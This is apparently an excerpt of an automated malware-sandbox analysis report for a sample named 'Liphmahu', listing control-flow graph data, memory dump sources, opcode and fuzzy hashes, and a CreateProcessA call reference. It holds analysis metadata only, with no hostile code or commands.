call 5d67cf8 1530->1584 1531->1505 1531->1507 1534->1534 1610 5d681d8 call 5d6acf0 1539->1610 1611 5d681d8 call 5d6ace1 1539->1611 1540->1510 1542->1526 1553->1502 1583->1584 1584->1531 1604->1605 1605->1509 1608->1499 1609->1499 1610->1540 1611->1540
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq$4'kq$4'kq
                                                                                  • API String ID: 0-2478202913
                                                                                  • Opcode ID: 1a06123ec445a5562df662112f0984ce069e225123f6a8472cdbc9ae185bdad0
                                                                                  • Instruction ID: 639724bbb0b4b865023767b44e2a6e85e8a89e2e41ed033ce90bf8b94ea94287
                                                                                  • Opcode Fuzzy Hash: 1a06123ec445a5562df662112f0984ce069e225123f6a8472cdbc9ae185bdad0
                                                                                  • Instruction Fuzzy Hash: 29F1B934B11218DFCB04DFA4D998A9DBBB2FF88301F158159E406AB3A5DB75EC42CB90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1612 5d6c780-5d6c790 1613 5d6c796-5d6c79a 1612->1613 1614 5d6c8a9-5d6c8ce 1612->1614 1615 5d6c8d5-5d6c8fa 1613->1615 1616 5d6c7a0-5d6c7a9 1613->1616 1614->1615 1617 5d6c901-5d6c937 1615->1617 1616->1617 1618 5d6c7af-5d6c7d6 1616->1618 1635 5d6c93e-5d6c994 1617->1635 1629 5d6c89e-5d6c8a8 1618->1629 1630 5d6c7dc-5d6c7de 1618->1630 1632 5d6c7e0-5d6c7e3 1630->1632 1633 5d6c7ff-5d6c801 1630->1633 1632->1635 1636 5d6c7e9-5d6c7f3 1632->1636 1634 5d6c804-5d6c808 1633->1634 1639 5d6c80a-5d6c819 1634->1639 1640 5d6c869-5d6c875 1634->1640 1651 5d6c996-5d6c9aa 1635->1651 1652 5d6c9b8-5d6c9cf 1635->1652 1636->1635 1638 5d6c7f9-5d6c7fd 1636->1638 1638->1633 1638->1634 1639->1635 1646 5d6c81f-5d6c866 call 5d60238 1639->1646 1640->1635 1641 5d6c87b-5d6c898 call 5d60238 1640->1641 1641->1629 1641->1630 1646->1640 1728 5d6c9ad call 5d6ce98 1651->1728 1729 5d6c9ad call 5d6cff9 1651->1729 1660 5d6c9d5-5d6cabb call 5d67ba8 call 5d675b0 * 2 call 5d67be8 call 5d6b3b8 call 5d675b0 call 5d6a550 call 5d68450 1652->1660 1661 5d6cac0-5d6cad0 1652->1661 1659 5d6c9b3 1663 5d6cbe3-5d6cbee 1659->1663 1660->1661 1672 5d6cad6-5d6cbb0 call 5d67ba8 * 2 call 5d68360 call 5d675b0 * 2 call 5d67860 call 5d67cf8 call 5d675b0 1661->1672 1673 5d6cbbe-5d6cbda call 5d675b0 1661->1673 1669 5d6cbf0-5d6cc00 1663->1669 1670 5d6cc1d-5d6cc3e call 5d67cf8 1663->1670 1682 5d6cc02-5d6cc08 1669->1682 1683 5d6cc10-5d6cc18 call 5d68450 1669->1683 1725 5d6cbb2 1672->1725 1726 5d6cbbb 1672->1726 1673->1663 1682->1683 1683->1670 1725->1726 1726->1673 1728->1659 1729->1659
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq$(oq$Hoq
                                                                                  • API String ID: 0-3836682603
                                                                                  • Opcode ID: 624b909542ad9da5119e212f21e7a5348b6b0553ddf88a8acd49825585f9ab0d
                                                                                  • Instruction ID: afa957b3d482174cf062a6371dcd10aa7b4aae0ca7eeb430acac480624773a72
                                                                                  • Opcode Fuzzy Hash: 624b909542ad9da5119e212f21e7a5348b6b0553ddf88a8acd49825585f9ab0d
                                                                                  • Instruction Fuzzy Hash: CCE11134B10209DFCB04EF68D4949ADBBB2FF89310F51856AE845AB365DB30ED46CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207785576.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq$4'kq
                                                                                  • API String ID: 0-4171853269
                                                                                  • Opcode ID: 085afe6f0157626737cca3ea56977ddfeddaafc6c7bfb6de75839fbafe59c45f
                                                                                  • Instruction ID: 7b05909aa97e502d88e463cfbaa628ee780705e4d49d19760a215c64bf479575
                                                                                  • Opcode Fuzzy Hash: 085afe6f0157626737cca3ea56977ddfeddaafc6c7bfb6de75839fbafe59c45f
                                                                                  • Instruction Fuzzy Hash: 6242E438E04219CFDB15DB99D948ABEBBB2FF58309F10801AF512A7354DB35A982CF51

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2355 5d62659-5d62694 2357 5d62696 2355->2357 2358 5d6269d-5d626b0 call 5d622e8 2355->2358 2357->2358 2361 5d626b6-5d626c9 2358->2361 2362 5d627f4-5d627fb 2358->2362 2372 5d626d7-5d626f1 2361->2372 2373 5d626cb-5d626d2 2361->2373 2363 5d62a95-5d62a9c 2362->2363 2364 5d62801-5d62816 2362->2364 2365 5d62a9e-5d62aa7 2363->2365 2366 5d62b0b-5d62b12 2363->2366 2378 5d62836-5d6283c 2364->2378 2379 5d62818-5d6281a 2364->2379 2365->2366 2370 5d62aa9-5d62abc 2365->2370 2368 5d62bae-5d62bb5 2366->2368 2369 5d62b18-5d62b21 2366->2369 2376 5d62bb7-5d62bc8 2368->2376 2377 5d62bd1-5d62bd7 2368->2377 2369->2368 2375 5d62b27-5d62b3a 2369->2375 2370->2366 2395 5d62abe-5d62b03 2370->2395 2390 5d626f3-5d626f6 2372->2390 2391 5d626f8-5d62705 2372->2391 2374 5d627ed 2373->2374 2374->2362 2398 5d62b3c-5d62b4b 2375->2398 2399 5d62b4d-5d62b51 2375->2399 2376->2377 2400 5d62bca 2376->2400 2385 5d62be9-5d62bf2 2377->2385 2386 5d62bd9-5d62bdf 2377->2386 2380 5d62904-5d62908 2378->2380 2381 5d62842-5d62844 2378->2381 2379->2378 2384 5d6281c-5d62833 2379->2384 2380->2363 2392 5d6290e-5d62910 2380->2392 2381->2380 2389 5d6284a-5d628be 2381->2389 2384->2378 2387 5d62bf5-5d62c6a 2386->2387 2388 5d62be1-5d62be7 2386->2388 2462 5d62c6c-5d62c76 2387->2462 2463 5d62c78 2387->2463 2388->2385 2388->2387 2496 5d628c0 call 5d4fbb0 2389->2496 2497 5d628c0 call 5d4fba2 2389->2497 2396 5d62707-5d6271b 2390->2396 2391->2396 2392->2363 2397 5d62916-5d6291f 2392->2397 2395->2366 2429 5d62b05-5d62b08 2395->2429 2396->2374 2428 5d62721-5d62775 2396->2428 2405 5d62a72-5d62a78 2397->2405 2398->2399 2406 5d62b53-5d62b55 2399->2406 2407 5d62b71-5d62b73 2399->2407 2400->2377 2410 5d62a7a-5d62a89 2405->2410 2411 5d62a8b 2405->2411 2406->2407 2414 5d62b57-5d62b6e 2406->2414 2407->2368 2409 5d62b75-5d62b7b 2407->2409 2409->2368 2416 5d62b7d-5d62bab 2409->2416 2419 5d62a8d-5d62a8f 2410->2419 2411->2419 2414->2407 2416->2368 2419->2363 2421 5d62924-5d62932 call 5d61408 2419->2421 2434 5d62934-5d6293a 2421->2434 2435 5d6294a-5d62964 2421->2435 2465 5d62777-5d62779 2428->2465 2466 5d62783-5d62787 2428->2466 2429->2366 2437 5d6293e-5d62940 2434->2437 2438 5d6293c 2434->2438 2435->2405 2443 5d6296a-5d6296e 2435->2443 2437->2435 2438->2435 2445 5d62970-5d62979 2443->2445 2446 5d6298f 2443->2446 2449 5d62980-5d62983 2445->2449 2450 5d6297b-5d6297e 2445->2450 2451 5d62992-5d629ac 2446->2451 2454 5d6298d 2449->2454 2450->2454 2451->2405 2470 5d629b2-5d62a33 2451->2470 2454->2451 2455 5d628c5-5d628cb 2456 5d628e2-5d628ed 2455->2456 2457 5d628cd-5d628df 2455->2457 2498 5d628ef call 5d4fbb0 2456->2498 2499 5d628ef call 5d4fba2 2456->2499 2457->2456 2468 5d62c7d-5d62c7f 2462->2468 2463->2468 2464 5d628f4-5d62901 2464->2380 2465->2466 2466->2374 2469 5d62789-5d627a1 2466->2469 2471 5d62c86-5d62c8b 2468->2471 2472 5d62c81-5d62c84 2468->2472 2469->2374 2476 5d627a3-5d627af 2469->2476 2492 5d62a35-5d62a47 2470->2492 2493 5d62a4a-5d62a70 2470->2493 2474 5d62c91-5d62cbe 2471->2474 2472->2474 2479 5d627b1-5d627b4 2476->2479 2480 5d627be-5d627c4 2476->2480 2479->2480 2481 5d627c6-5d627c9 2480->2481 2482 5d627cc-5d627d5 2480->2482 2481->2482 2483 5d627d7-5d627da 2482->2483 2484 5d627e4-5d627ea 2482->2484 2483->2484 2484->2374 2492->2493 2493->2363 2493->2405 2496->2455 2497->2455 2498->2464 2499->2464
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $kq$$kq
                                                                                  • API String ID: 0-3550614674
                                                                                  • Opcode ID: 05d5a90c72454f8a18d75046df247717ea25acd6e179174f046d16dcde16f31f
                                                                                  • Instruction ID: eabb0148900ef0c5aa6b7736ca9c493724fce35233542c0d014ed076cd7dc00d
                                                                                  • Opcode Fuzzy Hash: 05d5a90c72454f8a18d75046df247717ea25acd6e179174f046d16dcde16f31f
                                                                                  • Instruction Fuzzy Hash: 7B124C35A00219CFCB15DFA9D864AADBBB2FF48301F148056E852AB3A4DB78D946CF51

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2500 5d229d0-5d229f8 2501 5d229fa 2500->2501 2502 5d229ff-5d22a28 2500->2502 2501->2502 2503 5d22a2a-5d22a33 2502->2503 2504 5d22a49 2502->2504 2505 5d22a35-5d22a38 2503->2505 2506 5d22a3a-5d22a3d 2503->2506 2507 5d22a4c-5d22a50 2504->2507 2508 5d22a47 2505->2508 2506->2508 2509 5d22e07-5d22e1e 2507->2509 2508->2507 2511 5d22e24-5d22e28 2509->2511 2512 5d22a55-5d22a59 2509->2512 2513 5d22e2a-5d22e5a 2511->2513 2514 5d22e5d-5d22e61 2511->2514 2515 5d22a5b-5d22ab8 2512->2515 2516 5d22a5e-5d22a62 2512->2516 2513->2514 2519 5d22e82 2514->2519 2520 5d22e63-5d22e6c 2514->2520 2526 5d22aba-5d22b2b 2515->2526 2527 5d22abd-5d22ac1 2515->2527 2517 5d22a64-5d22a88 2516->2517 2518 5d22a8b-5d22aaf 2516->2518 2517->2518 2518->2509 2524 5d22e85-5d22e8b 2519->2524 2522 5d22e73-5d22e76 2520->2522 2523 5d22e6e-5d22e71 2520->2523 2529 5d22e80 2522->2529 2523->2529 2535 5d22b30-5d22b34 2526->2535 2536 5d22b2d-5d22b8a 2526->2536 2532 5d22ac3-5d22ae7 2527->2532 2533 5d22aea-5d22b11 2527->2533 2529->2524 2532->2533 2555 5d22b13-5d22b19 2533->2555 2556 5d22b21-5d22b22 2533->2556 2539 5d22b36-5d22b5a 2535->2539 2540 5d22b5d-5d22b81 2535->2540 2544 5d22b8f-5d22b93 2536->2544 2545 5d22b8c-5d22be8 2536->2545 2539->2540 2540->2509 2547 5d22b95-5d22bb9 2544->2547 2548 5d22bbc-5d22bbf 2544->2548 2557 5d22bea-5d22c4c 2545->2557 2558 5d22bed-5d22bf1 2545->2558 2547->2548 2562 5d22bc7-5d22bdf 2548->2562 2555->2556 2556->2509 2567 5d22c51-5d22c55 2557->2567 2568 5d22c4e-5d22cb0 2557->2568 2565 5d22bf3-5d22c17 2558->2565 2566 5d22c1a-5d22c32 2558->2566 2562->2509 2565->2566 2577 5d22c42-5d22c43 2566->2577 2578 5d22c34-5d22c3a 2566->2578 2575 5d22c57-5d22c7b 2567->2575 2576 5d22c7e-5d22c96 2567->2576 2579 5d22cb2-5d22d14 2568->2579 2580 5d22cb5-5d22cb9 2568->2580 2575->2576 2588 5d22ca6-5d22ca7 2576->2588 2589 5d22c98-5d22c9e 2576->2589 2577->2509 2578->2577 2590 5d22d16-5d22d78 2579->2590 2591 5d22d19-5d22d1d 2579->2591 2586 5d22ce2-5d22cfa 2580->2586 2587 5d22cbb-5d22cdf 2580->2587 2599 5d22d0a-5d22d0b 2586->2599 2600 5d22cfc-5d22d02 2586->2600 2587->2586 2588->2509 2589->2588 2601 5d22d7a-5d22dd3 2590->2601 2602 5d22d7d-5d22d81 2590->2602 2597 5d22d46-5d22d5e 2591->2597 2598 5d22d1f-5d22d43 2591->2598 2610 5d22d60-5d22d66 2597->2610 2611 5d22d6e-5d22d6f 2597->2611 2598->2597 2599->2509 2600->2599 2612 5d22dd5-5d22df9 2601->2612 2613 5d22dfc-5d22dff 2601->2613 2608 5d22d83-5d22da7 2602->2608 2609 5d22daa-5d22dcd 2602->2609 2608->2609 2609->2509 2610->2611 2611->2509 2612->2613 2613->2509
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207785576.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq$4'kq
                                                                                  • API String ID: 0-4171853269
                                                                                  • Opcode ID: 1439e7762a3cd26a29f5b85dc079f361a5694457ae609260a3cfa1e72b2f5764
                                                                                  • Instruction ID: 51f491ddef17f1f7e9c2d81021e3717fe064994171dada7f32ec4118fb1935ae
                                                                                  • Opcode Fuzzy Hash: 1439e7762a3cd26a29f5b85dc079f361a5694457ae609260a3cfa1e72b2f5764
                                                                                  • Instruction Fuzzy Hash: 5BF1C274E05218DFCB14DFA4E8986ACBBB2FF59316F20402AF416A7354DB35A986CF41

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2625 5d65ba0-5d65bb2 2626 5d65bb4-5d65bd5 2625->2626 2627 5d65bdc-5d65be0 2625->2627 2626->2627 2628 5d65be2-5d65be4 2627->2628 2629 5d65bec-5d65bfb 2627->2629 2628->2629 2630 5d65c07-5d65c33 2629->2630 2631 5d65bfd 2629->2631 2635 5d65e60-5d65ea7 2630->2635 2636 5d65c39-5d65c3f 2630->2636 2631->2630 2665 5d65ebd-5d65ec9 2635->2665 2666 5d65ea9 2635->2666 2637 5d65c45-5d65c4b 2636->2637 2638 5d65d11-5d65d15 2636->2638 2637->2635 2643 5d65c51-5d65c5e 2637->2643 2640 5d65d17-5d65d20 2638->2640 2641 5d65d38-5d65d41 2638->2641 2640->2635 2644 5d65d26-5d65d36 2640->2644 2645 5d65d66-5d65d69 2641->2645 2646 5d65d43-5d65d63 2641->2646 2647 5d65c64-5d65c6d 2643->2647 2648 5d65cf0-5d65cf9 2643->2648 2649 5d65d6c-5d65d72 2644->2649 2645->2649 2646->2645 2647->2635 2652 5d65c73-5d65c8b 2647->2652 2648->2635 2650 5d65cff-5d65d0b 2648->2650 2649->2635 2653 5d65d78-5d65d8b 2649->2653 2650->2637 2650->2638 2655 5d65c97-5d65ca9 2652->2655 2656 5d65c8d 2652->2656 2653->2635 2658 5d65d91-5d65da1 2653->2658 2655->2648 2664 5d65cab-5d65cb1 2655->2664 2656->2655 2658->2635 2659 5d65da7-5d65db4 2658->2659 2659->2635 2663 5d65dba-5d65dcf 2659->2663 2663->2635 2676 5d65dd5-5d65df8 2663->2676 2667 5d65cb3 2664->2667 2668 5d65cbd-5d65cc3 2664->2668 2671 5d65ed5-5d65ef1 2665->2671 2672 5d65ecb 2665->2672 2669 5d65eac-5d65eae 2666->2669 2667->2668 2668->2635 2673 5d65cc9-5d65ced 2668->2673 2674 5d65ef2-5d65ef8 2669->2674 2675 5d65eb0-5d65ebb 2669->2675 2672->2671 2681 5d65f1c-5d65f1f 2674->2681 2682 5d65efa-5d65f18 call 5d61408 2674->2682 2675->2665 2675->2669 2676->2635 2683 5d65dfa-5d65e05 2676->2683 2686 5d65f37-5d65f39 2681->2686 2687 5d65f21-5d65f27 2681->2687 2682->2681 2688 5d65e56-5d65e5d 2683->2688 2689 5d65e07-5d65e11 2683->2689 2712 5d65f3b call 5d67170 2686->2712 2713 5d65f3b call 5d65fb8 2686->2713 2690 5d65f2b-5d65f2d 2687->2690 2691 5d65f29 2687->2691 2689->2688 2696 5d65e13-5d65e29 2689->2696 2690->2686 2691->2686 2692 5d65f41-5d65f45 2694 5d65f47-5d65f5e 2692->2694 2695 5d65f90-5d65fa0 2692->2695 2694->2695 2703 5d65f60-5d65f6a 2694->2703 2700 5d65e35-5d65e4e 2696->2700 2701 5d65e2b 2696->2701 2700->2688 2701->2700 2707 5d65f6c-5d65f7b 2703->2707 2708 5d65f7d-5d65f8d 2703->2708 2707->2708 2712->2692 2713->2692
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq$d
                                                                                  • API String ID: 0-886291620
                                                                                  • Opcode ID: c00abf2c95ef5e3b39355a3c0c9f6c8ae0edd9a185d61e2fe49b734369456864
                                                                                  • Instruction ID: b1f25ec3311ca0d2f5af601ee974122b6df21055ca2d3b7d3a4c24a4a8bf5840
                                                                                  • Opcode Fuzzy Hash: c00abf2c95ef5e3b39355a3c0c9f6c8ae0edd9a185d61e2fe49b734369456864
                                                                                  • Instruction Fuzzy Hash: F1D16F34600606CFCB24CF18D58496AB7F6FF88310B99C55AE45A9B765DB30FC86CB90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2714 5d226a8-5d226cd 2716 5d226d4-5d226f1 2714->2716 2717 5d226cf 2714->2717 2718 5d22712 2716->2718 2719 5d226f3-5d226fc 2716->2719 2717->2716 2720 5d22715-5d22719 2718->2720 2721 5d22703-5d22706 2719->2721 2722 5d226fe-5d22701 2719->2722 2724 5d22934-5d2294b 2720->2724 2723 5d22710 2721->2723 2722->2723 2723->2720 2726 5d22951-5d22955 2724->2726 2727 5d2271e-5d22722 2724->2727 2728 5d22957-5d2297c 2726->2728 2729 5d2297f-5d22983 2726->2729 2730 5d22724-5d227c2 2727->2730 2731 5d2272a-5d2272e 2727->2731 2728->2729 2732 5d229a4 2729->2732 2733 5d22985-5d2298e 2729->2733 2738 5d227c4-5d22862 2730->2738 2739 5d227ca-5d227ce 2730->2739 2735 5d22730-5d2273d 2731->2735 2736 5d22758-5d2277d 2731->2736 2742 5d229a7-5d229ad 2732->2742 2740 5d22990-5d22993 2733->2740 2741 5d22995-5d22998 2733->2741 2799 5d22740 call 5d80e80 2735->2799 2800 5d22740 call 5d80e70 2735->2800 2762 5d2279e 2736->2762 2763 5d2277f-5d22788 2736->2763 2750 5d22864-5d228ff 2738->2750 2751 5d2286a-5d2286e 2738->2751 2745 5d227d0-5d227f5 2739->2745 2746 5d227f8-5d2281d 2739->2746 2748 5d229a2 2740->2748 2741->2748 2745->2746 2773 5d2283e 2746->2773 2774 5d2281f-5d22828 2746->2774 2748->2742 2760 5d22901-5d22926 2750->2760 2761 5d22929-5d2292c 2750->2761 2757 5d22870-5d22895 2751->2757 2758 5d22898-5d228bd 2751->2758 2752 5d22746-5d22755 2752->2736 2757->2758 2789 5d228de 2758->2789 2790 5d228bf-5d228c8 2758->2790 2760->2761 2761->2724 2772 5d227a1-5d227a8 2762->2772 2770 5d2278a-5d2278d 2763->2770 2771 5d2278f-5d22792 2763->2771 2776 5d2279c 2770->2776 2771->2776 2777 5d227aa-5d227b0 2772->2777 2778 5d227b8-5d227b9 2772->2778 2782 5d22841-5d22848 2773->2782 2780 5d2282a-5d2282d 2774->2780 2781 5d2282f-5d22832 2774->2781 2776->2772 2777->2778 2778->2724 2785 5d2283c 2780->2785 2781->2785 2786 5d2284a-5d22850 2782->2786 2787 5d22858-5d22859 2782->2787 2785->2782 2786->2787 2787->2724 2791 5d228e1-5d228e8 2789->2791 2793 5d228ca-5d228cd 2790->2793 2794 5d228cf-5d228d2 2790->2794 2795 5d228ea-5d228f0 2791->2795 2796 5d228f8-5d228f9 2791->2796 2798 5d228dc 2793->2798 2794->2798 2795->2796 2796->2724 2798->2791 2799->2752 2800->2752
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2207785576.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq$4'kq
                                                                                  • API String ID: 0-4171853269
                                                                                  • Opcode ID: 1e7a31f5be441d3e3212e241067ab0fdcebdf01114461c6bdf623b32d15303a1
                                                                                  • Instruction ID: e925289d45dd0cccae692d389f150470152106ea1d7b66ed4b4ebb0a9cd0959c
                                                                                  • Opcode Fuzzy Hash: 1e7a31f5be441d3e3212e241067ab0fdcebdf01114461c6bdf623b32d15303a1
                                                                                  • Instruction Fuzzy Hash: F5A1C538E05219DFDB18DFA8D5486ADBBB2FF98305F50802AF412A7350DB35A986CF51

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2801 5d641d1-5d64208 2803 5d642f4-5d64319 2801->2803 2804 5d6420e-5d64212 2801->2804 2811 5d64320-5d64344 2803->2811 2805 5d64226-5d6422a 2804->2805 2806 5d64214-5d64220 2804->2806 2808 5d64230-5d64247 2805->2808 2809 5d6434b-5d64370 2805->2809 2806->2805 2806->2811 2819 5d6425b-5d6425f 2808->2819 2820 5d64249-5d64255 2808->2820 2827 5d64377-5d643ca 2809->2827 2811->2809 2822 5d64261-5d6427a 2819->2822 2823 5d6428b-5d642a4 call 5d61340 2819->2823 2820->2819 2820->2827 2822->2823 2836 5d6427c-5d6427f 2822->2836 2834 5d642a6-5d642ca 2823->2834 2835 5d642cd-5d642f1 2823->2835 2845 5d64402-5d64427 2827->2845 2846 5d643cc-5d643ec 2827->2846 2838 5d64288 2836->2838 2838->2823 2853 5d6442e-5d6446b 2845->2853 2846->2853 2854 5d643ee-5d643ff 2846->2854
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq$(oq
                                                                                  • API String ID: 0-3207256227
                                                                                  • Opcode ID: d5c33ca200020be01b34ed6f5bd4ca8af78a35b3929c05e1f2663f3f176ff28e
                                                                                  • Instruction ID: ff7df11e7adb63e8e9ff6d686e42e901b386497a268aa86081364c4bc7e7cc20
                                                                                  • Opcode Fuzzy Hash: d5c33ca200020be01b34ed6f5bd4ca8af78a35b3929c05e1f2663f3f176ff28e
                                                                                  • Instruction Fuzzy Hash: 70518D313002059FDB159F29D885AAE7BA6FF88354F60816AE806CB395CF35EC46CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2860 5d61c30-5d61c42 2861 5d61d36-5d61d5b 2860->2861 2862 5d61c48-5d61c4a 2860->2862 2863 5d61d62-5d61d86 2861->2863 2862->2863 2864 5d61c50-5d61c5c 2862->2864 2876 5d61d8d-5d61db1 2863->2876 2868 5d61c70-5d61c80 2864->2868 2869 5d61c5e-5d61c6a 2864->2869 2868->2876 2877 5d61c86-5d61c94 2868->2877 2869->2868 2869->2876 2881 5d61db8-5d61e3d call 5d4f595 2876->2881 2880 5d61c9a-5d61c9f 2877->2880 2877->2881 2914 5d61ca1 call 5d61c22 2880->2914 2915 5d61ca1 call 5d61c30 2880->2915 2916 5d61ca1 call 5d61e30 2880->2916 2917 5d61ca1 call 5d61e20 2880->2917 2904 5d61e42-5d61e50 call 5d61408 2881->2904 2884 5d61ca7-5d61cf0 2898 5d61cf2-5d61d0b 2884->2898 2899 5d61d13-5d61d33 call 5d60208 2884->2899 2898->2899 2909 5d61e52-5d61e58 2904->2909 2910 5d61e68-5d61e6a 2904->2910 2911 5d61e5c-5d61e5e 2909->2911 2912 5d61e5a 2909->2912 2911->2910 2912->2910 2914->2884 2915->2884 2916->2884 2917->2884
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq$Hoq
                                                                                  • API String ID: 0-3084834809
                                                                                  • Opcode ID: d5fa003f02bf56944e1c019a8c23714b67a45767a900607bc441678fc030bd3c
                                                                                  • Instruction ID: 347876cda981f5b539663ab34de51cc469beaeedadaf04f36210579d2b75c9d3
                                                                                  • Opcode Fuzzy Hash: d5fa003f02bf56944e1c019a8c23714b67a45767a900607bc441678fc030bd3c
                                                                                  • Instruction Fuzzy Hash: 8F5179307006058FCB59AF78C458A2EBBB6FF85351B60456EE806DB3A5CE31ED06CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,oq
                                                                                  • API String ID: 0-651702701
                                                                                  • Opcode ID: 1b6cc17017ac21e7bb0bb07a1653c368e5520d86c3f0f322fd11e61fe4ed1458
                                                                                  • Instruction ID: f975e975d3970cdbca08f1eeff0ddc08e1a4cdc1f00744508f62d9b59e629198
                                                                                  • Opcode Fuzzy Hash: 1b6cc17017ac21e7bb0bb07a1653c368e5520d86c3f0f322fd11e61fe4ed1458
                                                                                  • Instruction Fuzzy Hash: ED521775A002288FCB64DF68C991BEDBBF6BF88300F5541DAE509A7351DA309E85CF61
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (_kq
                                                                                  • API String ID: 0-2183774854
                                                                                  • Opcode ID: aee11a68c953f6cc4fb48ab2b2c41844e48ec013fbbb02700d91c07bda949155
                                                                                  • Instruction ID: 4305aa5755741efc797dfbdb138f2eb81e0e27f303a3f3286b8cee66e0bf1e9f
                                                                                  • Opcode Fuzzy Hash: aee11a68c953f6cc4fb48ab2b2c41844e48ec013fbbb02700d91c07bda949155
                                                                                  • Instruction Fuzzy Hash: 3C227135A002049FDB14DF68D494AADBBF2FF88310F14846AE906DB3A5CB75ED46CB90
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06A2F8B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 943235cd4c02fb71b8b1b75d5c8e93703717387228aa968fa077f501405a5b17
                                                                                  • Instruction ID: 2ad6558dcc8b684559b48161134380fa026d75b1929dece2af3411a641f17cf8
                                                                                  • Opcode Fuzzy Hash: 943235cd4c02fb71b8b1b75d5c8e93703717387228aa968fa077f501405a5b17
                                                                                  • Instruction Fuzzy Hash: 32815571D8022A9FDB50DFA9C9817EDBBF2BF48310F248529E855EB254D7748881CF81
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06A2F8B2
                                                                                  Memory Dump Source
